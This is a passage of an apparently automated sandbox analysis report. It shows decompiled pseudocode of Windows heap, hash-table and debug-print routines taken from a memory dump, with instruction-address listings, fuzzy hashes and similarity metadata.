					_push(_v8 + _t83);
					E1E3AB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1e496378 = 1;
						asm("int3");
						 *0x1e496378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x1e4523e3
0x1e4523e8
0x1e4523eb
0x1e4523ee
0x1e4523f3
0x1e45259b
0x1e45259b
0x1e45259d
0x1e4525a3
0x1e4525a3
0x1e4523fb
0x1e452424
0x1e45244f
0x1e452460
0x1e452451
0x1e452451
0x1e452456
0x1e452458
0x1e452458
0x1e45245b
0x1e45245b
0x1e452426
0x1e452431
0x1e452436
0x1e452443
0x1e452438
0x1e452438
0x1e452438
0x1e452445
0x1e452445
0x1e452463
0x1e452469
0x1e45246f
0x1e452480
0x1e452495
0x1e4524a1
0x1e4524ce
0x1e4524df
0x1e4524d0
0x1e4524d0
0x1e4524d5
0x1e4524d7
0x1e4524d7
0x1e4524da
0x1e4524da
0x1e4524a3
0x1e4524b0
0x1e4524b5
0x1e4524c2
0x1e4524b7
0x1e4524b7
0x1e4524b7
0x1e4524c4
0x1e4524c4
0x1e4524e8
0x1e452497
0x1e45249a
0x1e45249a
0x1e452482
0x1e452488
0x1e452488
0x1e452471
0x1e452479
0x1e452479
0x1e4524ef
0x1e4523fd
0x1e452401
0x1e452412
0x1e452403
0x1e452403
0x1e452408
0x1e45240a
0x1e45240a
0x1e45240d
0x1e45240d
0x1e45241b
0x1e45241b
0x1e4524f1
0x1e4524f6
0x1e452507
0x1e452510
0x00000000
0x1e452510
0x1e45250b
0x00000000
0x1e4524f8
0x1e4524f8
0x1e4524fc
0x1e452500
0x1e452512
0x1e452515
0x1e45251a
0x1e452521
0x1e452524
0x1e452529
0x1e45252f
0x00000000
0x00000000
0x1e45253c
0x1e45255c
0x1e452561
0x1e45253e
0x1e452554
0x1e452559
0x1e45256a
0x1e45256d
0x1e452574
0x1e452586
0x1e452588
0x1e45258f
0x1e452590
0x1e452590
0x1e452597
0x00000000
0x1e452597

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 1E45256F
HEAP[%wZ]: , xrefs: 1E45254F
HEAP: , xrefs: 1E45255C

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: ca32ef060325ebdbbdab87a0647a34b5218f9347bbecf1ae9eed1ee65e9be22e
Instruction ID: bc85c73590d9a93c3ab4d920fd5c07dd033dbb2bb56afa8da480ca49f7c9ab75
Opcode Fuzzy Hash: ca32ef060325ebdbbdab87a0647a34b5218f9347bbecf1ae9eed1ee65e9be22e
Instruction Fuzzy Hash: 06510435110160CAE364CE2BC85477277F2EF4AA44F514A9BF8C28B385E275E847DB65

Uniqueness

Uniqueness Score: -1.00%

Function 1E47DFCE, Relevance: 3.5, APIs: 2, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E1E47DFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x1e49d360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E1E3EB640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x1e498680
							_v48 = _t15;
							L1E3CFAD0(_t15);
							_t17 = _t269 + 0xc; // 0x1e498674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E1E3CFA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E1E47E62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E1E3C2280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E1E3BFFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E1E3DF3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x1e49b1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E1E3BFFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E1E47E5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x1e49b1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E1E47E7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E1E47EE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E1E47E7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E1E3CFA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E1E47EE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}

0x1e47dfce
0x1e47dfdd
0x1e47dfe1
0x1e47dfe3
0x1e47dfea
0x1e47e49c
0x1e47e49c
0x1e47e49e
0x1e47e4b0
0x1e47e4b0
0x1e47dff0
0x1e47dff5
0x00000000
0x1e47e003
0x1e47e003
0x1e47e006
0x1e47e00b
0x1e47e00e
0x1e47e014
0x1e47e07d
0x1e47e07d
0x1e47e080
0x1e47e0d6
0x1e47e0dc
0x1e47e0de
0x1e47e0de
0x1e47e0e2
0x1e47e0e5
0x1e47e0ea
0x1e47e0ea
0x1e47e0ed
0x1e47e0ef
0x1e47e0f2
0x1e47e0f4
0x1e47e0f4
0x1e47e0f4
0x1e47e0f4
0x1e47e0f9
0x1e47e100
0x1e47e105
0x1e47e108
0x1e47e10b
0x1e47e10f
0x1e47e112
0x1e47e116
0x1e47e119
0x1e47e11d
0x1e47e122
0x00000000
0x00000000
0x1e47e124
0x1e47e127
0x1e47e12c
0x1e47e197
0x1e47e199
0x1e47e19b
0x1e47e1b8
0x1e47e1b8
0x1e47e1bc
0x1e47e1c4
0x1e47e1c8
0x1e47e1cd
0x1e47e1d2
0x1e47e1dc
0x1e47e1e1
0x1e47e1e3
0x1e47e1e3
0x1e47e1e6
0x1e47e1ea
0x1e47e1f2
0x1e47e1f8
0x1e47e1fa
0x1e47e1fd
0x1e47e201
0x1e47e204
0x1e47e208
0x1e47e20b
0x1e47e20f
0x1e47e214
0x1e47e258
0x1e47e258
0x1e47e258
0x1e47e25d
0x00000000
0x00000000
0x1e47e267
0x1e47e26d
0x1e47e26f
0x1e47e2a3
0x1e47e2a3
0x1e47e2a6
0x1e47e2ac
0x1e47e2b5
0x1e47e2ba
0x1e47e2bd
0x1e47e2c5
0x1e47e418
0x1e47e418
0x1e47e451
0x1e47e45e
0x1e47e460
0x1e47e463
0x1e47e469
0x1e47e46b
0x1e47e46e
0x1e47e470
0x00000000
0x1e47e470
0x1e47e2cd
0x1e47e2dc
0x00000000
0x00000000
0x1e47e2e2
0x1e47e2e8
0x1e47e2ec
0x1e47e2ec
0x1e47e2fb
0x1e47e303
0x1e47e305
0x1e47e30a
0x1e47e47d
0x1e47e483
0x00000000
0x00000000
0x1e47e485
0x1e47e485
0x1e47e487
0x1e47e48a
0x1e47e48f
0x1e47e495
0x00000000
0x1e47e310
0x1e47e310
0x1e47e310
0x1e47e315
0x1e47e328
0x1e47e32f
0x1e47e331
0x1e47e331
0x1e47e336
0x1e47e340
0x1e47e34b
0x1e47e34f
0x1e47e351
0x1e47e35f
0x1e47e35f
0x1e47e374
0x1e47e377
0x1e47e3e6
0x1e47e3e9
0x1e47e3f5
0x1e47e3f7
0x1e47e3fa
0x1e47e3ff
0x1e47e40a
0x1e47e410
0x1e47e415
0x1e47e415
0x00000000
0x00000000
0x00000000
0x00000000
0x1e47e379
0x1e47e379
0x1e47e379
0x1e47e37c
0x1e47e37f
0x1e47e37f
0x1e47e382
0x1e47e388
0x00000000
0x00000000
0x1e47e38c
0x1e47e3b6
0x1e47e3c1
0x1e47e3c6
0x1e47e3c8
0x1e47e3ce
0x1e47e3d0
0x1e47e3d3
0x1e47e3d3
0x1e47e3d8
0x1e47e3d8
0x1e47e3db
0x1e47e3e2
0x00000000
0x1e47e353
0x1e47e353
0x1e47e355
0x1e47e355
0x1e47e356
0x1e47e358
0x1e47e35b
0x00000000
0x1e47e355
0x1e47e351
0x1e47e317
0x1e47e31c
0x1e47e323
0x1e47e326
0x00000000
0x00000000
0x00000000
0x00000000
0x1e47e31e
0x1e47e31e
0x1e47e31e
0x1e47e31f
0x1e47e31f
0x00000000
0x1e47e31e
0x1e47e30a
0x00000000
0x1e47e26f
0x1e47e269
0x1e47e26b
0x00000000
0x1e47e26b
0x1e47e216
0x1e47e219
0x1e47e21e
0x1e47e29f
0x1e47e286
0x1e47e288
0x00000000
0x00000000
0x1e47e28a
0x1e47e294
0x00000000
0x00000000
0x00000000
0x1e47e29a
0x1e47e252
0x1e47e255
0x00000000
0x1e47e271
0x1e47e27b
0x1e47e283
0x00000000
0x1e47e283
0x1e47e1d4
0x1e47e1d4
0x00000000
0x1e47e1d4
0x1e47e19d
0x1e47e19d
0x1e47e1a7
0x1e47e1a9
0x1e47e1a9
0x1e47e1ae
0x00000000
0x1e47e1ae
0x1e47e15d
0x1e47e160
0x1e47e163
0x1e47e166
0x1e47e166
0x1e47e169
0x1e47e169
0x1e47e16e
0x00000000
0x00000000
0x1e47e177
0x1e47e17d
0x1e47e17f
0x00000000
0x00000000
0x1e47e18d
0x00000000
0x00000000
0x1e47e18f
0x00000000
0x1e47e18f
0x1e47e179
0x1e47e17b
0x00000000
0x1e47e17b
0x1e47e0f4
0x1e47e082
0x1e47e085
0x1e47e0cd
0x1e47e0d3
0x1e47e0d5
0x00000000
0x1e47e0d5
0x1e47e087
0x1e47e08a
0x1e47e0c4
0x1e47e0ca
0x1e47e0cc
0x00000000
0x1e47e0cc
0x1e47e08c
0x1e47e08f
0x1e47e0bb
0x1e47e0c1
0x1e47e0c3
0x00000000
0x1e47e0c3
0x1e47e091
0x1e47e094
0x1e47e0b2
0x1e47e0b8
0x1e47e0ba
0x00000000
0x1e47e0ba
0x1e47e096
0x1e47e099
0x1e47e0a9
0x1e47e0af
0x1e47e0b1
0x00000000
0x1e47e0b1
0x1e47e09e
0x00000000
0x00000000
0x1e47e0a6
0x1e47e0a8
0x00000000
0x1e47e0a8
0x1e47e018
0x1e47e01b
0x1e47e01e
0x1e47e023
0x1e47e025
0x1e47e062
0x1e47e06a
0x1e47e06e
0x1e47e073
0x1e47e075
0x1e47e075
0x1e47e07a
0x00000000
0x1e47e07a

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ed375863ff52d5830bac26ee6f8e96f5654e6bb4dcc969da8a5591bd376518f5
Instruction ID: db1d442541855e21bffe8e4d51982f66807d1e2b89a488d1d24f8a19b215e3dc
Opcode Fuzzy Hash: ed375863ff52d5830bac26ee6f8e96f5654e6bb4dcc969da8a5591bd376518f5
Instruction Fuzzy Hash: 96F19572E002568BCB18CFA9C9D15ADFBF6EF48200B55436EE856EB385D734E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E46D466, Relevance: 1.6, APIs: 1, Instructions: 123
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E1E46D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0x1e49d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E1E46DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x1e496114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0x1e49b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0x1e496110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E1E46D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E1E3BFFB0(_t69, _t90, _t90 + 0xc);
				}
				return E1E3EB640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

0x1e46d475
0x1e46d47b
0x1e46d492
0x1e46d49e
0x1e46d4a4
0x1e46d4ac
0x1e46d4bc
0x1e46d4be
0x1e46d4c4
0x1e46d4cc
0x1e46d4dc
0x1e46d4e1
0x1e46d4f5
0x1e46d4fb
0x1e46d4fd
0x1e46d501
0x1e46d53d
0x1e46d503
0x1e46d507
0x1e46d50e
0x1e46d510
0x1e46d520
0x1e46d524
0x1e46d526
0x1e46d528
0x1e46d52b
0x1e46d52e
0x1e46d530
0x1e46d530
0x1e46d533
0x1e46d536
0x1e46d537
0x1e46d53b
0x00000000
0x00000000
0x1e46d526
0x1e46d4c6
0x1e46d4c6
0x1e46d4c8
0x1e46d4c8
0x1e46d4c8
0x1e46d540
0x1e46d545
0x1e46d555
0x1e46d55a
0x1e46d55a
0x1e46d560
0x1e46d562
0x1e46d56e
0x1e46d56e
0x1e46d577
0x1e46d57d
0x1e46d57d
0x1e46d594
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E46D4F5

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 690b664d99d19e4252e3a2869c40a79b3dd6a129a707b4ac4fa3ad47faf455f6
Instruction ID: d0864a4aa792041ed95bf704db7576d5e79ba1ee2efd8a65913471f86806883c
Opcode Fuzzy Hash: 690b664d99d19e4252e3a2869c40a79b3dd6a129a707b4ac4fa3ad47faf455f6
Instruction Fuzzy Hash: 9941AF71E0012A9BCB14DFA9C881ABEB7F5FF8C214B51426AE855E7340D770ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E1E3D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t235;
				signed int _t240;
				signed int _t242;
				intOrPtr _t244;
				signed int _t247;
				signed int _t254;
				signed int _t257;
				signed int _t265;
				signed int _t271;
				signed int _t273;
				void* _t275;
				signed int _t276;
				unsigned int _t279;
				signed int _t283;
				signed int _t287;
				signed int _t291;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				void* _t333;

				_t327 = _t329;
				_t330 = _t329 - 0x4c;
				_v8 =  *0x1e49d360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x1e49b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t279 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t271 = 0x48;
				_t301 = 0 | _t333 == 0x00000000;
				_t313 = 0;
				_v37 = _t333 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t271 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L1E3C4620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t301 = _v32;
							 *(_t320 + 0x3c) = _t271;
							_t273 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t301 - 0x1e498478;
								 *_t320 = ((0 | _t301 == 0x1e498478) - 0x00000001 & 0xfffffffb) + 7;
								E1E3EF3E0(_t315,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t330 = _t330 + 0xc;
								_t273 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t265 = E1E4339F2(_t315);
									_t301 = _v32;
									_t315 = _t265;
								}
							}
							_t283 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t271 = _t320 + _t273 * 4;
								_v56 = _t271;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t230 =  *(_v60 + _t283 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
